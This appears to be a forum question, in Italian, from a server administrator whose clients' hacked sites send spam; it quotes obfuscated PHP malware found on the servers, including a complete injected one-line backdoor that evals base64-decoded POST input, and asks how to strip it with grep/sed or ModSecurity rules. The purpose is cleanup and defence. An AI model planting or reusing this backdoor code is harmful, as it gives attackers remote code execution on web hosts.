Ho più VPS con almeno migliaia di account al loro interno.
I siti Web dei miei clienti vengono violati e inviano email di spam. Ho controllato il registro e ho scoperto due tipi di scritps
Type1:
<?php
$d79="HYI\riP=s5'bX'a43Z #fn%dTy9c|JWjMV<z0Q]6&kD}UECrue~mq8->N2hpx_!Bo*g\nK\$O1{7G[^.L+Rw\;?FA)lt\tS@,/\":(v"; $GLOBALS['ujijy64'] = $d79[4].$d7
tipo2:
<?php
function wtakziboyl($gaezs, $fp){$vdxhvfmnol = ''; for($i=0; $i < strlen($gaezs); $i++){$vdxhvfmnol .= isset($fp[$gaezs[$i]]) ? $fp[$gaezs[$i]] : $gaezs[$i];}
$otcow="base64_decode";return $otcow($vdxhvfmnol);}
$sfnb = '4fwFMBxy214Q5XBm8exm1XHK2m83NZsBdZpzvpzUMRsz1jCwgJArtfxr1X'.
'Bm8exm8m83NSUzvpzUMRsz1jCwgJArtRhY1XBY2RCIgfwKtwxkMRIw5mpAbJ'.
'aiJa0y21cqgfwE2Bx3MRIzgJApOd3OJeweOfwy8XBkOJcqnkBPBaBPOPaOopQ55hxdcB'.
Dopo ulteriori indagini ho scoperto gli script iniettati nella parte superiore dei file originali come in basso
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n828e00'])) {eval($s21(${$s20}['n828e00']));}?>
Questo codice sopra sospetto come backdoor. Voglio rimuovere tutti quegli script o almeno impedirgli di eseguirlo. Posso essere io posso usare le regole modsec.
Navigando su Internet ho scoperto che possiamo eseguire il codice sottostante per rimuovere tale iniezione
grep -Rl PCT4BA6ODSE . | xargs sed -i 's/<[?]php.*PCT4BA6ODSE_.*[?]>/<\?php \/\/ RECOVERED FILE \?>/g'
Trovare manualmente tali file nel server in cui sono ospitati migliaia di account è qualcosa di impossibile. Quindi voglio farlo automaticamente (in questo caso)
So che ci sono molti altri backdoor ma per questo scenario cosa suggerisci?
Questa potrebbe non essere la buona idea e potrebbe influire sulle prestazioni del server, mi piacerebbe sentire qualsiasi idea alternativa.